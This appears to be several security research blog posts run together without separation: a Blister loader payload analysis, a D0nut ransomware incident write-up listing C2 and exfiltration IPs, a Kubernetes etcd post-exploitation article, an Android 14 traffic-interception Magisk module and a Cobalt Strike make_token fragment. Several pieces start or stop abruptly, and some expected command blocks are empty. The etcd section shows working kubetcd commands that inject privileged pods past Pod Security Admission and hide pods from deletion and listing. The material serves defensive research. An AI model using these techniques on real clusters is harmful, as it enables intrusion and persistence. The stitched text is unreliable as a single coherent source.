Because we want to keep the tables comprehensible, we have split up the data into four tables. For now, it is important to note that Table 2 provides information per Blister sample we unpacked, including the date it was first uploaded to VirusTotal, the version, the label of the payload it drops, the type of payload, and two configuration flags. Furthermore, to have a list of Blister and payload hashes in clear text in the blog, we included these in Table 6. We also included a more complete data set at https://github.com/fox-it/blister-research.
Discussing payloads
Looking at the dropped payloads, we see that it mostly conforms with what has already been reported. In Figure 1, we provide a timeline based on the first seen date of a sample in VirusTotal and the family of the payload. The observed payloads consist of Cobalt Strike, Mythic, Putty, and a test application. Initially, Blister dropped various flavors of Cobalt Strike and later dropped a Mythic agent, which we refer to as BlisterMythic. Recently, we also observed a packer that unpacks BlisterMythic, which we refer to as MythicPacker. Interestingly, we did not observe any samples drop BitRat.
Figure 1, Overview of Blister samples we were able to unpack, based on the first seen date reported in VirusTotal.
From the 137 samples, we were able to retrieve 74 unique payloads. This discrepancy in amount of unique Blister samples versus unique payloads is mainly caused by various Blister samples that drop the same Putty or test application, namely 18 and 22 samples, respectively. This summer has shown a particular increase in test payloads.
Cobalt Strike
Cobalt Strike was dropped through three different types of payloads, generic shellcode, DLL stagers, or obfuscated shellcode. In total, we retrieved 61 beacons, in Table 1 we list the Cobalt Strike watermarks we observed. Watermarks are a unique value linked to a license key. It should be noted that Cobalt Strike watermarks can be changed and hence are not a sound way to identify clusters of activity.
Watermark (decimal)
Watermark (hexadecimal)
Nr. of beacons
206546002
0xc4fa452
2
1580103824
0x5e2e7890
21
1101991775
0x41af0f5f
38
Table 1, Counted Cobalt Strike watermarks observed in beacons dropped by Blister.
The watermark 206546002, though only used twice, shows up in other reports as well, e.g. a report on an Emotet intrusion9 and a report linking it to Royal, Quantum, and Play ransomware activity10,11. The watermark 1580103824 is mentioned in reports on Gootloader12, but also Cl0p13 and also is the 9th most common beacon watermark, based on our dataset of Cobalt Strike beacons14. Interestingly, 1101991775, the watermark that is most common, is not mentioned in public reporting as far as we can tell.
Cobalt Strike profile generators
In Table 3, we list information on the extracted beacons. In there, we also list the submission path. Most of the submission paths contain /safebrowsing/ and /rest/2/meetings, matching with paths found in SourcePoint15, a Cobalt Strike command-and-control (C2) profile generator. This is only, however, for the regular shellcode beacons, when we look at the obfuscated shellcode and the DLL stager beacons, it seems to use a different C2 profile. The C2 profiles for these payloads match with another public C2 profile generator16.
Domain fronting
Some of the beacons are configured to use “domain fronting”, which is a technique that allows malicious actors to hide the true destination of their network traffic and evade detection by security systems. It involves routing malicious traffic through a content delivery network (CDN) or other intermediary server, making it appear as if the traffic is going to a legitimate or benign domain, while in reality, it’s communicating with a malicious C2 server.
Certain beacons have subdomains of fastly[.]net as their C2 server, e.g. backend.int.global.prod.fastly[.]net or python.docs.global.prod.fastly[.]net. However, the domains they connect to are admin.reddit[.]com or admin.wikihow[.]com, which are legitimate domains hosted on a CDN.
Obfuscated shellcode
In five cases, we observed Blister drop Cobalt Strike by first loading obfuscated shellcode. We included a YARA rule for this particular shellcode in the Appendix.
Performing a retrohunt on VirusTotal yielded only 12 samples, with names indicating potential test files and at least one sample dropping Cobalt Strike. We are unsure whether this is an obfuscator solely used by Evil Corp or whether it is used by other threat actors as well.
Figure 2, Layout of particular shellcode, with denoted steps.
The shellcode is fairly simple, we provide an overview of it in Figure 2. The entrypoint is at the start of the buffer, which calls into the decoding stub. This call instruction automatically pushes the next instruction’s address on the stack, which the decoding stub uses as a starting point to start mutating memory. Figure 3 shows some of these instructions, which are quite distinctive.
Figure 3, Decoding instructions observed in particular shellcode.
At the end of the decoding stub, it either jumps or calls back and then invokes the decryption function. This decryption function uses RC4, but the S-Box is already initialized, thus no key-scheduling algorithm is implemented. Lastly, it jumps to the final payload.
BlisterMythic
Matching with what was already reported by Unit 428, Blister recently started using Mythic agents as its payload. Mythic is one of the many red teaming frameworks on GitHub18. You can use various agents, which are listed on GitHub as well19 and can roughly be compared to a Cobalt Strike beacon. It is possible to write your own Mythic agent, as long as you comply with a set of constraints. Thus far, we keep seeing the same Mythic agent, which we discuss in more detail later on. The first sample dropping Mythic agents was uploaded to VirusTotal on July 24th 2023, just days before initial reportings of SocGholish infections leading to Mythic. In Table 4, we provide the C2 information from the observed Mythic agents.
We observed Mythic either as a Portable Executable (PE) or as shellcode. The shellcode seems to be rare and unpacks a PE file which thus far always resulted in a Mythic agent, in our experience. We discuss this packer later on as well and provide scripts that help with retrieving the PE file it packs. We refer to this specific Mythic agent as BlisterMythic and to the packer as MythicPacker.
In Table 5, we list the BlisterMythic C2 servers we were able to find. Interestingly, the domains were all registered at DNSPod. We also observed this in the past with Cobalt Strike domains we linked to Evil Corp. Apart from this, we also see similarities in the domain names used, e.g. domains consisting of two or three words concatenated to each other and using com as top-level domain (TLD).
Test payloads
Besides red team tooling like Mythic and Cobalt Strike, we also observed Putty and a test application as payloads. Running Putty through Blister does not seem logical and is likely linked to testing. It would only result in Putty not touching the disk and running in memory, which in itself is not useful. Additionally, when we look at the domain hashes in the Blister samples, only the Putty and test application samples in some cases share their domain hash.
Blister configurations
We also looked at the configurations of Blister, from this we can to some extent derive how it is used by attackers. Note that the collection also contains “test samples” from the attacker. Except for the more obvious Putty and test application, some samples that dropped Mythic, for instance, could also be linked to testing. We chose to leave out samples that drop Putty or the test application, leaving 97 samples in total. This means that the samples paint a partly biased picture, though we think it is still valuable and provides a view into how Blister is used.
Environmental keying
Since its update in 2022, Blister includes an optional domain hash, that it computes over the DNS search domain of the machine (ComputerNameDnsDomain). It only continues executing if the hash matches with its configuration, enabling environmental keying.
By looking at the amount of samples that have domain hash verification enabled, we can say something about how Blister is deployed. From the 66 Blister samples, only 6 samples did not have domain hash verification enabled. This indicates it is mostly used in a targeted manner, corresponding with using SocGholish for initial access and reconnaissance and then deploying Blister, for example.
Persistence
Of the 97 samples, 70 have persistence enabled. For persistence, Blister still uses the same method as described by Elastic Security20. It mostly uses IFileOperation COM interface to copy rundll32.exe and itself to the Startup folder, this is significant for detection, as it means that these operations are done by the process DllHost.exe, not the rundll32.exe process that hosts Blister.
Blister trying new things
Blister’s previous update altered the core payload, however, the loader that is injected into the legitimate executable remained unchanged. In August this year, we observed experimental samples on VirusTotal with an obfuscated loader component, hinting at developer activity. Interestingly, we could link these samples to another sample on VirusTotal which solely contained the function body of the loader and another sample that contained a loader with a large set of INT 3 instructions added to it. Perhaps the developer was experimenting with different mutations to see how it influences the detection rate.
Obfuscating the first stage
Recent samples from September 2023 have the loader obfuscated in the same manner, with bogus instructions and excessive jump instructions. These changes make it harder to detect Blister using YARA, as the loader instructions are now intertwined with junk instructions and sometimes are followed by junk data due to the added jump instructions.
Figure 4, Comparison of two loader components from recent Blister samples, left is without obfuscation and right is with obfuscation.
In Figure 4, we compare the two function bodies of the loader, one body which is normally seen in Blister samples and one obfuscated function body, observed in the recent samples. The comparison shows that naïve YARA rules are less likely to trigger on the obfuscated function body. In the Appendix, we provide a Blister rule that tries to detect these obfuscated samples. The added bogus instructions include instructions, such as btc, bts, lahf and cqo, bogus instructions we also observed in the Blister core before, see the core component of SHA256 4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4, for example.
Dropping Mythic agents
Apart from an obfuscated loader, Mythic agents currently are the payload of choice. In September and October, we found obfuscated Blister samples only dropping Mythic. Certain samples have low or zero detections on VirusTotal21 at the time of writing, showing that obfuscation does pay off.
We now discuss one sample22 that drops a shellcode eventually executing a Mythic agent. The shellcode unpacks a PE file and executes it. We provide a YARA rule for this packer in the Appendix, which we refer to as MythicPacker. Based on this rule, we did not find other samples, suggesting it is a custom packer. Until now, we have only seen this packer unpacking Mythic agents.
The dropped Mythic agents are all similar and we cannot link them to any public agents thus far. This could mean that Blister developers created their own Mythic agent, though this is uncertain. We provided a YARA rule that matches on all agents we encountered, a VirusTotal retrohunt over the past year resulted in only four samples, all linked to Blister. We think this Mythic agent is likely custom-made.
Figure 5, BlisterMythic configuration decryption.
The agents all share a similar structure, namely an encrypted configuration in the .bss section of the executable. The agent has an encrypted configuration which is decrypted by XORing the size of the configuration with a constant that differs per sample, it seems. For PE files, we have a Python script that can decrypt a configuration. Figure 5 denotes this decryption loop, where the XOR constant is 0x48E12000.
Figure 6, Decrypted BlisterMythic configuration
Dumping the configuration results in a binary blob that contains various information, including the C2 server. Figure 6 shows a hexdump of a snippet from the decrypted configuration. We created a script to dump the decrypted configuration of the BlisterMythic agent in PE format and also a script that unpacks MythicPacker shellcode and outputs a reconstructed PE file, see https://github.com/fox-it/blister-research.
Conclusion
In this post, we provided an overview of observed Blister payloads from the past one and a half years on VirusTotal and also gave insight into recent developments. Furthermore, we provided scripts and YARA rules to help analyze Blister and the Mythic agent it drops.
From the analyzed payloads, we see that Cobalt Strike was the favored choice, but that lately this has been replaced by Mythic. Cobalt Strike was mostly dropped as shellcode and briefly run through obfuscated shellcode or a DLL stager. Apart from Cobalt Strike and Mythic, we saw that Blister test samples are uploaded to VirusTotal as well.
The custom Mythic agent together with the obfuscated loader, are new Blister developments that happened in the past months. It is likely that its developers were aware that the loader component was still a weak spot in terms of static detection. Additionally, throughout the years, Cobalt Strike has received a lot of attention from the security community, with available dumpers and C2 feeds readily available. Mythic is not as popular and allows you to write your own agent, making it an appropriate replacement for now.
Unveiling the Dark Side: A Deep Dive into Active Ransomware Families
Author: Ross Inman (@rdi_x64)
Introduction
Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.
In case you missed it, last time we analysed an Incident Response engagement involving BlackCat Ransomware. In this instalment, we take a deeper dive into the D0nut extortion group.
The D0nut extortion group was first reported in August 2022 for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released with speculation that the ransomware deployed by the group was linked to HelloXD ransomware. There is also suspected links between D0nut affiliates and both Hive and Ragnar Locker ransomware operations.
Summary
Tl;dr
This post explores some of the TTPs employed by a threat actor who was observed deploying D0nut ransomware during an incident response engagement.
Below provides a summary of findings which are presented in this blog post:
Heavy use of Cobalt Strike Beacons to laterally move throughout the compromised network.
Deployment of SystemBC to establish persistence.
Modification of a legitimate GPO to disable Windows Defender across the domain.
Leveraging a BYOVD to terminate system-level processes which may interfere with the deployment of ransomware.
Use of RDP to perform lateral movement and browse folders to identify data for exfiltration.
Data exfiltration over SFTP using Rclone.
Deployment of D0nut ransomware.
D0nut
D0nut leaks is a group that emerged during Autumn of 2022 and was initially reported to be performing intrusions into networks with an aim of exfiltrating data which they would then hold to ransom, without encrypting any files1. Further down the line, the group were seen adopting the double-extortion approach2. This includes encrypting files and holding the decryption key for ransom, as well as threatening to publish the stolen data should the ransom demand not be met.
Numerous potential links have been made to other ransomware groups and affiliates, with the ransomware encryptor reportedly sharing similarities with the HelloXD ransomware strain. Indications of a link were observed through the filenames of the ransomware executable deployed throughout the incident, with the filenames being xd.exe and wxd7.exe. However, it should be noted that this alone is not compelling evidence to indicate a link between the ransomware strains.
Incident Overview
Once the threat actor had gained their foothold within the network, they conducted lateral movement with a focus on the following objectives:
Compromise a host which stores sensitive data which can be targeted for exfiltration.
Compromise a domain controller.
Cobalt Strike was heavily utilised to deploy Beacon, the payload generated by Cobalt Strike, to multiple hosts on the network so the threat actor could extend their access and visibility.
A Remote Desktop Protocol (RDP) session was established to a file server, which allowed the threat actor to browse the file system and identify folders of interest to target for exfiltration. Data exfiltration was conducted using Rclone to upload files to a Secure File Transfer Protocol (SFTP) server controlled by the threat actor. Rclone allows for uploading of files directly from folders to cloud storage, meaning the threat actor did not need to perform any data staging prior to the upload.
Before deploying the ransomware, the threat actor deployed malware capable of leveraging a driver, which has been used by other ransomware groups3, to terminate any anti-virus (AV) or endpoint detection and response (EDR) processes running on the system; this technique is known as bring your own vulnerable driver (BYOVD). Additionally, the threat actor modified a pre-existing group policy object (GPO) and appended configuration that would prevent Windows Defender from interfering with any malware that was dropped on the systems.
Ransomware was deployed to both user workstations and servers on the compromised domain. An ESXi server was also impacted, resulting in the hosted virtual machines suffering encryption that was performed at the hypervisor level.
The total time from initial access to encryption is believed to be less than a week.
TTPs
Lateral Movement
The following methods were utilised to move laterally throughout the victim network:
Cobalt Strike remotely installed temporary services on targeted hosts which executed Beacon, triggering a call back to the command and control (C2) server and providing the operator access to the system. An example command line of what the services were configured to run is provided below:
A service was installed in the system.
Service Name: <random alphanumeric characters>
Service File Name: \\<target host>\ADMIN$\<random alphanumeric characters>.exe
Service Type: user mode service
Service Start Type: demand start
Service Account: LocalSystem
RDP sessions were established using compromised domain accounts.
PsExec was also used to facilitate remote command execution across hosts.
Persistence
The threat actor used SystemBC to establish persistence within the environment. The malware was set to execute whenever a user logs in to the system, which was achieved by modifying the registry key Software\Microsoft\Windows\CurrentVersion\Run within the DEFAULT registry hive (please note this is not referring to the hive located at C:\Users\DEFAULT\NTUSER.dat, but the hive located at C:\Windows\System32\config\DEFAULT). An entry was created under the run key which ran the following command, resulting in execution of SystemBC:
As part of their efforts to evade interference from security software, the threat actor made use of two files, d.dll and def.exe, which were responsible for dropping the vulnerable driver RTCore64.sys, which has reportedly been exploited by other ransomware groups to disable AV and EDR solutions. The files were dropped in the following folders:
C:\temp\
C:\ProgramData\
Analysis of def.exe identified that the program escalated privileges via process injection, allowing it to terminate any system-level processes not present in its internally stored whitelist.
The threat actor took additional measures by appending registry configurations to a pre-existing GPO that would disable detection and prevention functionality of Windows Defender. Exclusions for all files with a .exe or .dll extension were also set, along with exclusions for files within the C:\ProgramData\ and C:\directories. The below configuration was applied across all hosts present on the compromised domain:
Command and Control
Cobalt Strike Beacons were heavily utilised to maintain a presence within the network and to extend access via lateral movement.
SystemBC was also deployed sparingly and appeared to be purely for establishing persistence within the network. SystemBC is a commodity malware backdoor which leverages SOCKS proxying for covert channelling of C2 communications to the operator. Serving as a proxy, SystemBC becomes a conduit for other malware deployed by threat actors to tunnel C2 traffic. Additionally, certain variants facilitate downloading and execution of further payloads, such as shellcode or PowerShell scripts issued by the threat actor.
Analysis of the executable identified the following IP addresses which are contacted on port 4001 to establish communications with the C2 server:
85.239.52[.]7
194.87.111[.]29
Exfiltration
Rclone, an open-source file cloud storage program heavily favoured by threat actors to perform data exfiltration, was deployed once the threat actor had identified a system which hosted data of interest. Through recovering the Rclone configuration file located at C:\User\<user>\AppData\Roaming\rclone.conf, the SFTP server 83.149.93[.]150 was identified as the destination of the exfiltrated data.
Initially deployed as rclone.exe, the threat actor swiftly renamed the file to explorer.exe in an attempt to blend in. However, due to the file residing in the File Server Resource Manager (FSRM) folder C:\StorageReports\Scheduled\, this artefact was highly noticeable.
Impact
Ransomware was deployed to workstations and servers once the threat actor had exfiltrated data from the network to use as leverage in the forthcoming ransom demands. The ransomware also impacted an ESXi server, encrypting the hosted virtual machines at the hypervisor level.
Volume shadow copies for a data drive of a file server were purged by the threat actor preceding the ransomware execution.
The ransomware was downloaded and executed via the following PowerShell command:
In some other instances, the ransomware was deployed as wxd7.exe. The ransomware executables were observed being executed from the following locations (however it is likely that the folders may vary from case to case and the threat actor uses any folders in the root of C:\):
C:\Temp\
C:\ProgramData\
C:\storage\
C:\StorageReports\
During analysis of the ransomware executable, the following help message was derived which provides command line arguments for the program:
A fairly unique ransom note is dropped after the encryption process in the form of a HTML file named readme.html:
Recommendations
Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.
Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the Hypervisors.
Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.
Monitor firewalls for anomalous spikes in data leaving the network.
Apply Internet restrictions to servers so that they can only establish external communications with known good IP addresses and domains that are required for business operations.
If you have been impacted by D0nut, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 331 630 0690 or email [email protected].
Kubernetes is essentially a framework of various services that make up its typical architecture, which can be divided into two roles: the control-plane, which serves as a central control hub and hosts most of the components, and the nodes or workers, where containers and their respective workloads are executed.
Within the control plane we typically find the following components:
kube-apiserver: This component acts as the brain of the cluster, handling requests from clients (such as kubectl) and coordinating with other components to ensure their proper functioning.
scheduler: Responsible for determining the appropriate node to deploy a given pod to.
control manager: Manages the status of nodes, jobs or service accounts.
etcd: A key-value store that stores all cluster-related data.
Inside the nodes we typically find:
kubelet: An agent running on each node, responsible for keeping the pods running and in a healthy state.
kube-proxy: Exposes services running on pods to the network.
When considering the attack surface in Kubernetes, we consider certain unauthenticated components, such as the kube-apiserver and kubelet, as well as leaked tokens or credentials that grant access to certain cluster features, and non-hardened containers that may provide access to the underlying host. However, when discussing etcd, it is often perceived solely as an information storage element within the cluster from which secrets can be extracted. However, etcd is much more than that.
What is etcd and how it works?
Etcd, which is an external project to the core of Kubernetes, is a non-relational key-value database that stores all the information about the cluster, including pods, deployments, network policies, roles, and more. In fact, when performing a cluster backup, what is actually done is a dump of etcd, and during a restore operation, this is also done through this component. Given its critical role in the Kubernetes architecture, can’t we use it for more than just extracting secrets?
Its function as a key-value database is straightforward. Entries can be added or edited using the put command, the value of keys can be retrieved using get, deletions can be performed using delete, and a directory tree structure can be created:
$ etcdctl put /key1 value1
OK
$ etcdctl put /folder1/key1 value2
OK
$ etcdctl get / --prefix --keys-only
/folder1/key1
/key1
$ etcdctl get /folder1/key1
/folder1/key1
value2
How kubernetes uses etcd: Protobuf
While the operation of etcd is relatively straightforward, let’s take a look at how Kubernetes injects its resources into the database, such as a pod. Let’s create a pod and extract its entry from etcd:
As you can see, the data extracted from the pod in etcd is not just alphanumeric characters. This is because Kubernetes serialises the data using protobuf.
Protobuf, short for Protocol Buffers, is a data serialisation format developed by Google that is independent of programming languages. It enables efficient communication and data exchange between different systems. Protobuf uses a schema or protocol definition to define the structure of the serialised data. This schema is defined using a simple language called the Protocol Buffer Language.
For example, let’s consider a protobuf message to represent data about a person. We would define the structure of the protobuf message as follows:
syntax = "proto3";
message Person {
string name = 1;
int32 age = 2;
string email = 3;
}
If we wanted to serialise other types of data, such as car or book data, the parameters required to define them would be different to those required to define a person. The same principle is true for Kubernetes. In Kubernetes, multiple resources can be defined, such as pods, roles, network policies, and namespaces, among others. While they share a common structure, not all of them can be serialised in the same way, as they require different parameters and definitions. Therefore, different schemas are required to serialise these different objects.
Fortunately, there is auger, an application developed by Joe Betz, a technical staff member at Google. Auger collects the Kubernetes source code and all the schemas, allowing the serialisation and deserialisation of data stored in etcd into YAML and JSON formats. At NCC Group, we have created a wrapper for auger called kubetcdto demonstrate the potential criticality of a compromised etcd through a proof of concept (PoC).
Limitations
As a post-exploitation technique, this approach has several limitations. The first and most obvious is that we would need to have compromised the host running the etcd service as root. This is necessary because we need access to the following certificates in order to authenticate to the etcd service, which are typically only exposed on localhost. The default paths used by most installation scripts are:
/etc/kubernetes/pki/etcd/ca.crt
/etc/kubernetes/pki/etcd/server.crt
/etc/kubernetes/pki/etcd/server.key (this is only readable by root)
A second limitation is that we would need to have the desired items already present in the cluster in order to use them as templates, especially for those that execute, such as pods. This is necessary because there is execution metadata that is added once the build request has passed through the kube-apiserver, and occasionally there is third-party data (e.g. Calico) that is not typically included in a raw manifest.
The third and final limitation is that this technique is only applicable to self-managed environments, which can include on-premises or virtual instances in the cloud. Cloud providers that offer managed Kubernetes are responsible for managing and securing the control plane, which means that access to not only etcd but also the scheduler or control manager is restricted and users cannot interact with them. Therefore, this technique is not suitable for managed environments.
Injecting resources and tampering data
Recognising that data entry is done through serialisation with protobuf using different schemas, the kubetcd wrapper aims to emulate the typical syntax of the native kubectl client. However, when interacting directly with etcd, many fields that are managed by the logic of the kube-apiserver can be modified without restriction. A simple example would be the timestamp, which indicates the creation date and time of a pod:
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 38s
root@kind-control-plane:/# kubetcd create pod nginx -t nginx --time2000-01-31T00:00:00Z
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/nginx
OK
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 23y
Changing the timestamp of a newly created Pod would help to make it appear, beyond what is shown in the event logs, as if it had been running in the cluster for a certain period of time. This could give any administrator pause as to whether it would be appropriate to delete it or whether it would affect any services.
Persistence
Now that we know we can tamper with the startup date of a pod, we can explore modifying other parameters, such as changing the path in etcd to gain persistence in the cluster. When we create a pod named X, it is injected into etcd at the path /registry/pods/<namespace>/X. However, with direct access to etcd, we can make the pod name and its path in the database not match, which will prevent it from being deleted by the kube-apiserver:
root@kind-control-plane:/# kubetcd create pod nginxpersistent -t nginx -p randomentry
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/randomentry
OK
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 23y
nginxpersistent 1/1 Running 0 23y
root@kind-control-plane:/# kubectl delete pod nginxpersistent
Error from server (NotFound): pods "nginxpersistent" not found
Taking this a step further, it is possible to create inconsistencies in pods by manipulating not only the pod name, but also the namespace. By running pods in a namespace that does not match the entry in etcd, we can make them semi-hidden and difficult to identify or manage effectively:
root@kind-control-plane:/# kubetcd create pod nginx_hidden -t nginx -n invisible --fake-ns
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/invisible/nginx_hidden
OK
Note that with --fake-ns, the invisible namespace is only used for the etcd injection path, but the default namespace has not been replaced in its manifest. Because of this inconsistency, the pod will not appear when listing the default namespace, and the invisible namespace will not be indexed. This pod will only appear when all resources are listed using --all or -A:
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 23y
nginxpersistent 1/1 Running 0 23y
root@kind-control-plane:/# kubectl get namespaces
NAME STATUS AGE
default Active 13m
kube-node-lease Active 13m
kube-public Active 13m
kube-system Active 13m
local-path-storage Active 13m
root@kind-control-plane:/# kubectl get pods -A | grep hidden
default nginx_hidden 1/1 Running 0 23y
By manipulating the namespace entry in etcd, we can create pods that appear to run in one namespace, but are actually associated with a different namespace defined in their manifest. This can cause confusion and make it difficult for administrators to accurately track and manage pods within the cluster.
These are just a few basic examples of directly modifying data in etcd, specifically in relation to pods. However, the possibilities and combinations of these techniques can lead to other interesting scenarios.
Bypassing AdmissionControllers
Kubernetes includes several elements for cluster hardening, specifically for pods and their containers. The most notable elements are:
SecurityContext, which allows, among other things, preventing a pod from running as root, mounting filesystems in read-only mode, or blocking capabilities.
Seccomp, which is applied at the node level and restricts or enables certain syscalls.
AppArmor, which provides more granular syscall management than Seccomp.
However, all of these hardening features may require policies to enforce their use, and this is where Admission Controllers come into play. There are several types of built-in admission controllers, and custom ones can also be created, known as webhook admission controllers. Whether built-in or webhook, they can be of two types:
Validation: They accept or deny the deployment of a resource based on the defined policy. For example, the NamespaceExist Admission Controller denies the creation of a resource if the specified namespace does not exist.
Mutation: These modify the resource and the cluster to allow its deployment. For example, the NamespaceAutoProvision Admission Controller checks resource requests to be deployed in a namespace and creates the namespace if it does not exist.
There is a built-in validation type Admission Controller that enforces the deployment of hardened pods, known as the Pod Security Admission (PSA). This Admission Controller supports three predefined levels of security, known as the Pod Security Standard, which are detailed in the official Kubernetes documentation. In summary, they are as follows:
Privileged: No restrictions. This policy would allow you to have all permissions to perform a pod breakout.
Baseline: This policy applies a minimum set of hardening rules, such as restricting the use of host-shared namespaces, using AppArmor, or allowing only a subset of capabilities.
Restricted: This is the most restrictive policy and applies almost all available hardening options.
PSAs replace the obsolete Pod Security Policies (PSP) and are applied at the namespace level, so all pods deployed in a namespace where these policies are defined are subject to the configured pod security standard.
It is worth noting that these PSAs apply equally to all roles, so even a cluster admin could not circumvent these restrictions unless they regenerated the namespace by disabling these policies:
root@kind-control-plane:/# kubectl get ns restricted-ns -o yaml
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2023-05-23T10:20:22Z"
labels:
kubernetes.io/metadata.name: restricted-ns
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/warn: restricted
name: restricted-ns
resourceVersion: "3710"
uid: 2277ebac-e487-4d59-8a09-97bef27cc0d9
spec:
finalizers:
- kubernetes
status:
phase: Active
root@kind-control-plane:/# kubectl run nginx --image nginx -n restricted-ns
Error from server (Forbidden): pods "nginx" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "nginx" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "nginx" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "nginx" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "nginx" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
As expected, not even a cluster administrator is allowed to deploy a pod without meeting all the security requirements imposed by the PSA. However, it is possible to inject privileged pods into namespaces restricted by PSAs using etcd:
root@kind-control-plane:/# kubetcd create pod nginx_privileged -t nginx -n restricted-ns -P
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Privileged SecurityContext Added
Path injected: /registry/pods/restricted-ns/nginx_privileged
OK
root@kind-control-plane:/# kubectl get pods -n restricted-ns
NAME READY STATUS RESTARTS AGE
nginx_privileged 1/1 Running 0 23y
root@kind-control-plane:/# kubectl get pod nginx_privileged -n restricted-ns -o yaml | grep "restricted\\|privileged:"
namespace: restricted-ns
privileged: true
Being able to deploy unrestricted privileged pods it would be easy to get a shell on the underlying node. This demonstrates that gaining write access to an etcd node, whether deployed as a pod within the cluster, as a local service in the control plane or as an isolated node as part of an etcd cluster, could compromise the kubernetes cluster and all its underlying infrastructure.
Why this works?
When working with the regular client, kubectl, it sends all requests directly to the kube-apiserver, where processes are executed in the following order: authentication, authorisation and Admission Controllers. Once the request has been authenticated, authorised and filtered through the admission controllers, the kube-apiserver redirects the request to the other components of the cluster to organise the provisioning of the desired resource. In other words, the kube-apiserver is not only the entry point to the cluster, but also applies all the controls for accessing it.
However, by injecting these resources directly into etcd, we bypass all these controls because the request does not go from the client to the kube-apiserver, but from the database in the backend where the cluster elements are stored. As the current architecture of Kubernetes is designed, it places trust in etcd, assuming that if an element is already in the database, it has already passed all the controls imposed by the kube-apiserver.
Mitigating the threat
Despite the capabilities of this post-exploitation technique, it would be easily detectable, especially if we seek to obtain shells on the nodes, mainly by third-party runtime security solutions with good log ingest times, such as Falco or some EDRs, which run at the node level.
However, as already demonstrated, gaining access to the nodes would be a simple task, and since most container engines run as root by default, and with the user namespace disabled, we would get a direct shell as root in most cases. This would allow us to manipulate host services and processes, be they EDRs or agents for sending logs. Enabling user namespace, using container sandboxing technologies or setting the container engine to rootless mode could help mitigate this attack vector.
Conclusions
The state-of-the-art regarding the attack surface in a Kubernetes cluster has been defined for some time, focusing on elements such as unauthenticated kube-apiserver or kubelet services, leaked tokens or credentials, and various pod breakout techniques. Most of the techniques described so far in relation to etcd have focused primarily on the extraction of secrets and the lack of encryption of data at rest.
This paper aims to demonstrate that a compromised etcd is the most critical element within the cluster, as it is not subject to role restrictions or the AdmissionControllers. This makes it easy to compromise not only the cluster itself, but also its underlying infrastructure, including all the nodes on which a kubelet is deployed.
This should make us rethink the implementation of etcd and its reliability within the cluster by implementing additional mechanisms that ensure data integrity.
Android 14 introduced a new feature which allows to remotely install CA certificates. This change implies that instead of using the /system/etc/security/cacerts directory to check the trusted CA’s, this new feature uses the com.android.conscrypt APEX module, and reads the certificates from the directory /apex/com.android.conscrypt/cacerts.
Inspired by this blog post by Tim Perry, I decided to create a Magisk module that would automate the work required to intercept traffic on Android 14 with tooling such as Burp Suite, and that uses the installed user certificates in a similar fashion as the MagiskTrustUserCerts module does.
This Magisk module makes all installed user CA’s part of the Conscrypt APEX module’s CA certificates, so that they will automatically be used when building the trust chain on Android 14.
Note: It should be noted that if an application has implemented SSL Pinning, it would not be possible to intercept the HTTPS traffic.
APEX: A quick overview
The Android Pony EXpress (APEX) container format was introduced in Android 10 and it is used in the install flow for lower-level system modules. This format facilitates the updates of system components that do not fit into the standard Android application model. Some example components are native services and libraries, hardware abstraction layers (HALs), runtime (ART), and class libraries.
With the introduction of APEX, system libraries in Android can be updated individually like Android apps. The main benefit of this is that system components can be individually updated via the Android Package Manager instead of having to wait for a full system update.
The Conscrypt module (com.android.conscrypt) is distributed as an APEX file and it is used as a Java Security Provider. On Android 14, an updatable root trust store has been introduced within Conscrypt. This allows for faster CA updates allowing to revoke trust of problematic or failing CAs on all Android 14 devices.
The script that appears on Tim Perry’s blog post was used as the template for the module, but some modifications were required in order to use it as a Magisk module.
In Magisk, boot scripts can be run in 2 different modes: post-fs-data and late_start service mode. As it was required that the Zygote process was started, the boot script was set to be run in the late_start service mode.
To ensure that the boot process was completed before we mounted our CA certificates over the Conscrypt directory inside Zygote’s mount namespace, the system property sys.boot_completed was used to check that the process finished, as it is set to 1 once the whole boot process is completed.
The following piece of code was added at the beginning of the script:
while [ "$(getprop sys.boot_completed)" != 1 ]; do
/system/bin/sleep 1s
done
The script was also modified in order to use the user installed CA’s with the following code:
In this post, he explains how the Windows program runas works and how the netonly flag allows the creation of processes where the local identity differs from the network identity (the local identity remains the same, while the network identity is represented by the credentials used by runas).
Cobalt Strike provides the make_token command to achieve a similar result to runas /netonly.
If you are familiar with this command, you have likely experienced situations in which processes created by Beacon do not “inherit” the new token properly. The inner workings of this command are fairly obscure, and searching Google for something like “make_token cobalt strike” does not provide much valuable information (in fact, it is far more useful to analyse the implementations of other frameworks such as Sliver or Covenant).
“If you are in a privileged context, you can use make_token in Beacon to create an access token with credentials”
“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”
